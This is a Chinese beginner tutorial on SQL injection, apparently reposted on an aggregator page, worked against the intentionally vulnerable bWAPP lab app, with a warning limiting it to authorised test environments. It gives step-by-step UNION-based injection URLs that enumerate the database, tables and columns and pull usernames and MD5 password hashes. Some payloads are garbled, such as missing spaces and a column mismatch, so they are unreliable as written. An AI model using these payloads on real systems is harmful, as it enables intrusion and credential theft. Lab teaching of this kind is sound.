当前位置: 首页 > news >正文

渗透入门之SQL 注入(1)

重要声明

SQL注入实验仅可在自己搭建的合法测试环境(如本地虚拟机、授权的测试服务器)中进行,严禁对任何非授权系统实施测试,否则可能违反《网络安全法》等法律法规,需承担相应法律责任。

一、实验环境

  • 操作系统:Linux、Windows10,;
  • 平台:天枢一体化虚拟仿真平台

1、bwapp环境准备

  • 环境部署:平台已完成部署
  • 环境访问:浏览器输入http://192.168.0.100,点击“Login”进入登录页,默认账号密码:bee/bug
  • 安全级别设置:登录后点击顶部“Security Level”,选择“Low”(关闭基础防护,便于注入测试),点击“Apply”保存;
  • 场景定位:点击顶部“Buggy Apps”,在下拉菜单中根据场景类型选择对应模块,即可进入目标测试页面。

(1) 使用前需要配置键盘

(2)IP配置(用户名bee,密码bug)

sudo ip addr add 192.168.1.100/24 dev 网卡名

二、SQL注入常见场景分类及核心特征(bwapp环境适配)

SQL注入按请求方式、应用场景可分为6类,核心原理均为“用户输入未过滤直接拼接SQL”,但注入点位置、参数传递方式存在差异。

1、SQL Injection (GET/Search):GET请求搜索类注入

bwapp场景定位Buggy Apps > SQL Injection > "SQL Injection - Search (GET)"实验步骤正常业务验证:进入测试页面,在搜索框输入Man,点击“Search”,页面显示包含“Man”的用户信息(正常响应);

1步骤1:判断注入点类型及存在性

在搜索框输入man'(添加单引号),点击“Search”,页面显示MySQL语法错误(如You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''bee''' at line 1),说明存在字符型注入;

注释符验证:输入man' --(注意--后加空格),点击“Search”,页面无语法错误且正常显示结果,确认注入点有效;

2步骤2:判断查询的字段数:
① 判断列数:输入Man'order by1---,点击“Search”,页面正常显示,依次输入,至此说明查询结果为7列;


② 利用MySQL自带的information_schema库,提取当前数据库名、版本、用户等信息:

目标信息

构造URL示例

当前数据库名

http://192.168.0.100/bwapp/sqli_1.php?title=man'unionselect1,database(),34,5,6,7---

MySQL版本

http://192.168.0.100/bwapp/sqli_1.php?title=man'unionselect1,version(),34,5,6,7---

数据库用户

http://192.168.0.100/bwapp/sqli_1.php?title=man'unionselect1,user(),34,5,6,7---

数据存储目录

http://192.168.0.100/bwapp/sqli_1.php?title=man'unionselect1,@@datadir,3,4,5,6,7---

示例结果:

当前数据库名是bwapp

MySQL版本为5.0.96

用户为root@localhost

数据存储目录

3步骤3:获取数据库中的表名

提取bwapp数据库下的所有表名(重点关注users表,存储账号密码):

http://192.168.0.100/bwapp/sqli_1.php?title=man' UNION SELECT 1,table_name,3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()-- -

页面会列出表名:usersmoviesblogsguestbook等(核心目标:users)。

4步骤4:获取users表的列名

提取users表的所有列名(如账号、密码、邮箱等):

http://192.168.0.100/bwapp/sqli_1.php?title=man' UNION SELECT 1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_schema=database() AND table_name='users' -- -

页面会显示列名:idusernamepasswordemailadmin等。

5步骤5:提取users表的账号密码数据

最终目标:获取用户凭证,构造URL如下:因本次用户名在login列

http://192.168.0.100/bwapp/sqli_1.php?title=man' UNION SELECT 1,login,password FROM users -- -

页面会显示:

解密MD5值,beebug(与BWAPP默认密码一致)。

6步骤6:验证结果

用提取到的beebug登录BWAPP,验证账号密码的有效性。

http://www.jsqmd.com/news/136550/

相关文章:

  • 14、编程中的继承与配置:问题、替代方案与最佳实践
  • 60、深入探索MVC与C互操作性:从链接生成到原生代码调用
  • react 之服务端渲染(SSR)
  • 语音克隆用于社交机器人:GPT-SoVITS赋予聊天机器人独特声线
  • 【毕业设计】SpringBoot+Vue+MySQL 协同过滤算法东北特产销售系统平台源码+数据库+论文+部署文档
  • Keil MDK中C程序链接脚本定制详细说明
  • 61、.NET 互操作服务的安全与使用详解
  • 硬件I2C总线空闲状态判定:通俗解释电平逻辑
  • 统计发现 | JMP Pro软件官方正式版详细下载教程
  • 2026年度最佳远控软件TOP榜单:寻找你的「生产力最佳搭档」
  • SpringBoot+Vue 协同过滤算法黔醉酒业白酒销售系统平台完整项目源码+SQL脚本+接口文档【Java Web毕设】
  • 6、软件项目中的可逆性与追踪子弹开发法
  • 过碳酸钠出口厂商有哪些?有出口资质的过碳酸钠供应商,过碳酸钠外贸公司推荐 - 品牌2026
  • 亚马逊“用户领航”新逻辑,跳出爆款追随陷阱,打造长青爆品
  • 企业级协同过滤算法黔醉酒业白酒销售系统管理系统源码|SpringBoot+Vue+MyBatis架构+MySQL数据库【完整版】
  • 过碳酸钠供应商名单盘点!过碳酸钠供货商批发商核心企业名录 - 品牌2026
  • 7、软件开发中的原型、领域语言与估算技巧
  • @AllArgsConstructor
  • 成膜助剂代理商有哪些?成膜助剂贸易公司推荐,靠谱代理商推荐汇总 - 品牌2026
  • 高低温型红外测温传感器及时捕捉温度变化防风险
  • 9、版本控制与调试:软件开发的关键技能
  • 62、COM编程深入解析:从基础到高级应用
  • 语音合成在语音玩具中的应用:让玩具有自己的‘性格声音’
  • 24、软件开发:按需交付与用户愉悦之道
  • 语音克隆用于影视后期:GPT-SoVITS辅助对白补录与翻译配音
  • 1.md
  • 工业级产品中PCB原理图设计可靠性分析全面讲解
  • 25、编程的责任与智慧:从代码署名到道德考量
  • 语音克隆与品牌声音资产化:企业如何注册和管理专属语音商标
  • hbuilderx开发微信小程序前端界面:手把手教程(从零实现)